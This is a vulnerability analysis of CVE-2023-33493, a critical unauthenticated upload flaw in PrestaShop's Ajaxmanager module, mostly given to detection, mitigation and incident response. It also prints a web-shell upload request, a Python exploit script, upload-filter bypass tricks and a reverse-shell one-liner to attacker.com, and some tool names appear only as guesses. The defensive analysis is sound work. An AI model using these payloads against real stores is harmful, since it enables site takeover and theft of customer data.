CVE-2023-33493
Weakness (CWE): CWE-434 (Unrestricted Upload of File with Dangerous Type)
CVSS Vector (v3.1):
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
An Unrestricted Upload of File with Dangerous Type vulnerability in the Ajaxmanager File and Database explorer (ajaxmanager) module for PrestaShop through 2.3.0, allows remote attackers to upload dangerous files without restrictions.
Comprehensive Technical Analysis of CVE-2023-33493
CVE ID: CVE-2023-33493
CVSS Score: 9.8 (Critical)
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2023-33493 is a critical-severity vulnerability in the Ajaxmanager File and Database Explorer module for PrestaShop (versions up to and including 2.3.0). The flaw allows unauthenticated remote attackers to upload arbitrary files with dangerous extensions (e.g., .php, .jsp, .asp, .sh, .exe) without proper validation or restrictions.
CVSS Vector Breakdown (v3.1)
| Metric | Value | Explanation |
|---|---|---|
| AV | Network (N) | Exploitable remotely over the network. |
| AC | Low (L) | No special conditions, race windows, or target-specific preparation required. |
| PR | None (N) | No privileges required; unauthenticated exploitation. |
| UI | None (N) | No user interaction needed. |
| S | Unchanged (U) | Exploit affects the same security scope as the vulnerable component. |
| C | High (H) | Full confidentiality impact (server files and database contents exposed via code execution). |
| I | High (H) | Full integrity impact (arbitrary code execution). |
| A | High (H) | Full availability impact (DoS or system takeover). |
Severity Justification: Critical (9.8) due to:
- Unauthenticated remote exploitation (no credentials required).
- Arbitrary file upload leading to remote code execution (RCE).
- No mitigating factors (e.g., no authentication, no input sanitization).
- High impact on the CIA triad (Confidentiality, Integrity, Availability).
2. Potential Attack Vectors & Exploitation Methods
Exploitation Workflow
1. Identify Vulnerable Target:
   - Attacker scans for PrestaShop instances running Ajaxmanager ≤ 2.3.0.
   - Common reconnaissance methods:
     - Shodan (`http.title:"PrestaShop"+http.component:"ajaxmanager"`).
     - Manual testing via `GET /modules/ajaxmanager/requests`.
2. File Upload Exploitation:
   - The module's file upload functionality lacks:
     - File extension validation (e.g., `.php`, `.phtml`, `.phar` allowed).
     - MIME type verification (bypassed via `Content-Type` spoofing).
     - Server-side file content checks (e.g., magic bytes, syntax validation).
   - Attacker crafts a malicious payload (e.g., PHP web shell) and uploads it via:
     ```http
     POST /modules/ajaxmanager/upload.php HTTP/1.1
     Host: vulnerable-prestashop.com
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

     ------WebKitFormBoundary
     Content-Disposition: form-data; name="file"; filename="shell.php"
     Content-Type: application/x-php

     <?php system($_GET['cmd']); ?>
     ------WebKitFormBoundary--
     ```
3. Remote Code Execution (RCE):
   - Once uploaded, the attacker accesses the file (e.g., `https://victim.com/modules/ajaxmanager/uploads/shell.php?cmd=id`).
   - Impact:
     - Arbitrary command execution (e.g., `whoami`, `cat /etc/passwd`).
     - Reverse shell establishment (e.g., `bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'`).
     - Database compromise (if PrestaShop credentials are accessible).
     - Lateral movement (if the server is part of a larger network).
4. Post-Exploitation:
   - Persistence: Install backdoors (e.g., cron jobs, hidden admin accounts).
   - Data Exfiltration: Steal customer data, payment details, or PII.
   - Defacement: Modify website content.
   - Ransomware Deployment: Encrypt files and demand payment.
Exploitation Tools & Techniques
- Manual Exploitation:
  - Burp Suite / OWASP ZAP for intercepting and modifying upload requests.
  - `curl` or Python (`requests` library) for automated exploitation.
- Automated Exploitation:
  - Metasploit Module: (if available, likely under `exploit/multi/http/prestashop_ajaxmanager_fileupload`).
  - Custom Scripts: Python/Go scripts to automate file upload and RCE.
- Bypass Techniques:
  - Double Extensions: `shell.php.jpg` (if basic checks exist).
  - Null Byte Injection: `shell.php%00.jpg` (if PHP version is vulnerable).
  - MIME Spoofing: Setting `Content-Type: image/jpeg` for a `.php` file.
3. Affected Systems & Software Versions
Vulnerable Software
- Module: Ajaxmanager File and Database Explorer
- Vendor: Friends of Presta (FoP)
- Affected Versions: ≤ 2.3.0
- PrestaShop Compatibility: Likely affects PrestaShop 1.6.x – 8.x (depending on module integration).
Detection Methods
- Manual Check:
  - Verify module version via:
    ```shell
    curl -s https://[target]/modules/ajaxmanager/config.xml | grep -i version
    ```
  - Check for upload endpoints:
    ```shell
    curl -I https://[target]/modules/ajaxmanager/upload.php
    ```
- Automated Scanning:
  - Nmap Script:
    ```shell
    nmap -p 80,443 --script http-prestashop-ajaxmanager-detect [target]
    ```
  - Nuclei Template:
    ```yaml
    id: CVE-2023-33493
    info:
      name: PrestaShop Ajaxmanager Unrestricted File Upload
      severity: critical
      reference: https://security.friendsofpresta.org/module/2023/07/28/ajaxmanager.html
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/modules/ajaxmanager/upload.php"
        headers:
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
        body: |
          ------WebKitFormBoundary
          Content-Disposition: form-data; name="file"; filename="test.php"
          Content-Type: application/x-php

          <?php echo "Vulnerable"; ?>
          ------WebKitFormBoundary--
        matchers:
          - type: word
            words:
              - "Vulnerable"
    ```
4. Recommended Mitigation Strategies
Immediate Actions (For PrestaShop Administrators)
1. Upgrade the Module:
   - Apply the latest patch from Friends of Presta.
   - If no patch is available, disable or remove the module immediately.
2. Temporary Workarounds:
   - Restrict Access:
     - Block `/modules/ajaxmanager/` via `.htaccess` or WAF rules.
     - Example `.htaccess` rule (placed in the module directory):
       ```apache
       # Apache 2.4 users: replace "Deny from all" with "Require all denied"
       <FilesMatch "\.(php|phar|phtml|jsp|asp|sh|exe)$">
           Deny from all
       </FilesMatch>
       ```
   - File Upload Restrictions:
     - Harden the PHP configuration (`php.ini`) to confine file access and disable shell-execution functions:
       ```ini
       open_basedir = /var/www/html/
       disable_functions = exec, system, passthru, shell_exec
       ```
     - Set strict file permissions:
       ```shell
       # 750 rather than 640: a directory needs the execute bit to be traversable
       chmod 750 /modules/ajaxmanager/uploads/
       chown www-data:www-data /modules/ajaxmanager/uploads/
       ```
3. Monitor for Exploitation:
   - Log Analysis:
     - Check for suspicious uploads in `/modules/ajaxmanager/uploads/`.
     - Monitor web server logs for `POST /modules/ajaxmanager/upload.php`.
   - Intrusion Detection:
     - Deploy Snort/Suricata rules to detect file upload attempts:
       ```
       alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"CVE-2023-33493 - PrestaShop Ajaxmanager File Upload"; flow:to_server,established; content:"/modules/ajaxmanager/upload.php"; http_uri; content:"filename="; http_client_body; pcre:"/filename\s*=\s*[^&]*\.(php|phar|jsp|asp|sh|exe)/i"; classtype:web-application-attack; sid:1000001; rev:1;)
       ```
Long-Term Security Hardening
1. Input Validation & Sanitization:
   - Implement whitelist-based file extension checks (e.g., only `.jpg`, `.png`, `.pdf`).
   - Use libmagic or fileinfo to verify file content.
   - Example PHP validation:
     ```php
     $allowedExtensions = ['jpg', 'png', 'pdf'];
     $fileExtension = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
     if (!in_array(strtolower($fileExtension), $allowedExtensions)) {
         die("Invalid file type.");
     }
     ```
2. Server-Side Protections:
   - Disable PHP Execution in Upload Directories:
     ```apache
     # <Directory> takes the absolute filesystem path of the uploads directory
     <Directory "/modules/ajaxmanager/uploads">
         php_flag engine off
     </Directory>
     ```
   - Use a Web Application Firewall (WAF):
     - ModSecurity OWASP CRS (Rule 933150 for file upload attacks).
     - Cloudflare WAF (Custom rules to block malicious uploads).
3. PrestaShop Security Best Practices:
   - Regularly update PrestaShop core and modules.
   - Disable unused modules.
   - Enable PrestaShop's built-in security features (e.g., CSRF protection, password policies).
   - Use a non-default admin URL (e.g., `/admin123` instead of `/admin`).
5. Impact on the Cybersecurity Landscape
Broader Implications
1. E-Commerce Threat Landscape:
   - PrestaShop is a high-value target for attackers due to:
     - Payment data storage (PCI DSS compliance risks).
     - Large user base (over 300,000 active stores).
   - Similar vulnerabilities (e.g., CVE-2022-36408, CVE-2021-37536) have led to mass exploitation campaigns.
2. Exploitation Trends:
   - Automated Scanning: Attackers use tools like Masscan or Zgrab to find vulnerable instances.
   - Ransomware & Magecart: Exploited sites are often used for:
     - Skimming attacks (stealing credit card data).
     - Cryptojacking (Monero mining).
     - Ransomware deployment (e.g., LockBit, REvil).
   - Supply Chain Risks: Compromised PrestaShop modules can lead to third-party breaches.
3. Regulatory & Compliance Risks:
   - GDPR Violations: Unauthorized data access may result in fines up to 4% of global revenue.
   - PCI DSS Non-Compliance: Failure to secure payment data can lead to merchant account suspension.
4. Threat Actor Motivation:
   - Financial Gain: Stolen payment data sold on dark web markets.
   - Espionage: Targeting specific e-commerce businesses for competitive intelligence.
   - Hacktivism: Defacing websites for political or ideological reasons.
6. Technical Details for Security Professionals
Root Cause Analysis
1. Vulnerable Code Snippet (Hypothetical Example):
   ```php
   // ajaxmanager/upload.php (Vulnerable Version)
   $targetDir = "uploads/";
   $targetFile = $targetDir . basename($_FILES["file"]["name"]);
   move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile);
   ```
   Issues:
   - No file extension validation.
   - No MIME type verification.
   - No server-side content checks.
   - No CSRF protection.
2. Patched Code (Secure Example):
   ```php
   $allowedExtensions = ['jpg', 'png', 'pdf'];
   $fileExtension = strtolower(pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION));
   $fileMime = mime_content_type($_FILES["file"]["tmp_name"]);
   if (!in_array($fileExtension, $allowedExtensions)
       || !in_array($fileMime, ['image/jpeg', 'image/png', 'application/pdf'])) {
       die("Invalid file type.");
   }
   $targetDir = "uploads/";
   // Server-generated name: the user-supplied filename never reaches the filesystem (prevents path traversal)
   $targetFile = $targetDir . uniqid() . "." . $fileExtension;
   move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile);
   ```
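Added example, not part of the advisory or the module's code: a Python version of the same validation idea that also closes the bypasses listed in section 2 (double extensions, null bytes, MIME spoofing) by ignoring the client-declared Content-Type and checking magic bytes instead. The allow-list, magic values and name policy are assumptions made for the demonstration.

```python
import os
import re
import secrets
from typing import Optional, Tuple

# Assumed allow-list for the demonstration: extension -> magic bytes the content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF-",),
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, content: bytes) -> Tuple[Optional[str], str]:
    """Return (stored_name, reason); stored_name is None when the upload is rejected.
    The client-declared Content-Type is never consulted: it is attacker-controlled."""
    name = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied directory part
    if "\x00" in name or "%00" in name:                    # null-byte truncation trick
        return None, "null byte in filename"
    parts = name.split(".")
    if len(parts) != 2:                                    # catches "shell.php.jpg" and bare names
        return None, "exactly one extension required"
    stem, ext = parts[0], parts[1].lower()
    if ext not in ALLOWED:
        return None, f"extension .{ext} not allowed"
    if not SAFE_STEM.match(stem):
        return None, "unsafe characters in filename"
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return None, "content does not match extension"   # defeats MIME spoofing
    if b"<?php" in content or b"<?=" in content:           # defence in depth against polyglot files
        return None, "script marker found in content"
    # The server picks the stored name; the original filename never touches the filesystem.
    return f"{secrets.token_hex(16)}.{ext}", "accepted"
```

The stored file should additionally live in a directory with script execution disabled, as described under Server-Side Protections below.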
Exploitation Proof of Concept (PoC)
```python
import requests

target = "https://vulnerable-prestashop.com"
upload_url = f"{target}/modules/ajaxmanager/upload.php"
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
response = requests.post(upload_url, files=files)
if "success" in response.text.lower():
    print("[+] File uploaded successfully!")
    print(f"[+] Access shell at: {target}/modules/ajaxmanager/uploads/shell.php?cmd=id")
else:
    print("[-] Exploitation failed.")
```
Forensic Indicators of Compromise (IoCs)
| Indicator | Description |
|---|---|
| File Paths | /modules/ajaxmanager/uploads/*.php |
| Log Entries | POST /modules/ajaxmanager/upload.php with .php files |
| Network Traffic | Outbound connections to attacker-controlled C2 servers |
| Processes | Unusual child processes of apache2/nginx (e.g., bash, python) |
| Persistence | Cron jobs, .bashrc modifications, hidden admin accounts |
Detection & Response Playbook
1. Detection:
   - SIEM Alerts: Monitor for:
     - Unusual `POST` requests to `/modules/ajaxmanager/upload.php`.
     - File creation events in `/modules/ajaxmanager/uploads/`.
   - EDR/XDR: Detect anomalous process execution (e.g., `php -r` commands).
2. Containment:
   - Isolate the server from the network.
   - Disable the Ajaxmanager module via the PrestaShop admin panel.
3. Eradication:
   - Remove malicious files from `/modules/ajaxmanager/uploads/`.
   - Rotate all credentials (database, admin, API keys).
4. Recovery:
   - Restore from a clean backup (pre-exploitation).
   - Apply patches and harden the server.
5. Post-Incident Review:
   - Determine initial access vector (e.g., unpatched module, weak credentials).
   - Improve monitoring for similar vulnerabilities.
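Added example, not from the advisory: a small Python triage script that applies the log-analysis guidance, the IoC table and the detection step above to constructed Apache access-log lines, flagging POSTs to the upload endpoint and later hits on scripts under the uploads directory. The endpoint and directory paths come from this page; the sample log lines are constructed, and the regex assumes Apache combined log format.

```python
import re
from typing import Dict, List

# Constructed Apache combined-format sample (not real traffic); paths are the ones named in the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jul/2023:10:01:12 +0000] "GET /index.php?id_product=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Jul/2023:10:02:44 +0000] "POST /modules/ajaxmanager/upload.php HTTP/1.1" 200 51 "-" "python-requests/2.31"
203.0.113.9 - - [28/Jul/2023:10:02:45 +0000] "GET /modules/ajaxmanager/uploads/shell.php?cmd=id HTTP/1.1" 200 77 "-" "python-requests/2.31"
198.51.100.4 - - [28/Jul/2023:10:05:01 +0000] "POST /modules/ajaxmanager/upload.php HTTP/1.1" 403 0 "-" "curl/8.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/modules/ajaxmanager/upload.php"
UPLOAD_DIR = "/modules/ajaxmanager/uploads/"
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)  # server-side script extensions


def find_indicators(log_text: str) -> List[Dict[str, str]]:
    """Flag POSTs to the upload endpoint and requests for scripts inside the uploads directory."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        path = m["target"].split("?", 1)[0]  # compare the path without its query string
        kind = None
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            kind = "upload_attempt"
        elif path.startswith(UPLOAD_DIR) and EXEC_EXT.search(path):
            kind = "script_access"
        if kind:
            findings.append({"ip": m["ip"], "ts": m["ts"], "kind": kind,
                             "status": m["status"], "path": path})
    return findings


def triage(findings: List[Dict[str, str]]) -> Dict[str, str]:
    """Per source IP: an accepted upload followed by a 2xx hit on a script is likely compromise."""
    verdict: Dict[str, str] = {}
    for f in findings:
        ok = f["status"].startswith("2")
        prev = verdict.get(f["ip"], "")
        if f["kind"] == "upload_attempt":
            verdict[f["ip"]] = "upload_accepted" if ok else "upload_rejected"
        elif prev == "upload_accepted" and ok:
            verdict[f["ip"]] = "likely_compromise"
        elif prev not in ("upload_accepted", "likely_compromise"):
            verdict[f["ip"]] = "script_access_only"  # script hit with no preceding upload seen
    return verdict
```

Running `triage(find_indicators(SAMPLE_LOG))` on the constructed sample yields a likely compromise for 203.0.113.9 and a rejected attempt for 198.51.100.4; in practice, feed it the live access log and pair any `likely_compromise` verdict with a file listing of the uploads directory.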
Conclusion
CVE-2023-33493 represents a critical risk to PrestaShop-based e-commerce platforms due to its low-complexity exploitation and high-impact consequences (RCE, data theft, ransomware). Organizations must prioritize patching, implement compensating controls, and enhance monitoring to mitigate this threat. Given the active exploitation of similar vulnerabilities, proactive security measures are essential to prevent compromise.
Recommended Next Steps:
- Patch immediately (or disable the module if no patch is available).
- Scan for IoCs (malicious files, suspicious log entries).
- Harden PrestaShop (WAF, file upload restrictions, least privilege).
- Monitor for exploitation attempts (SIEM, EDR, network traffic analysis).
For further details, refer to the Friends of Presta advisory.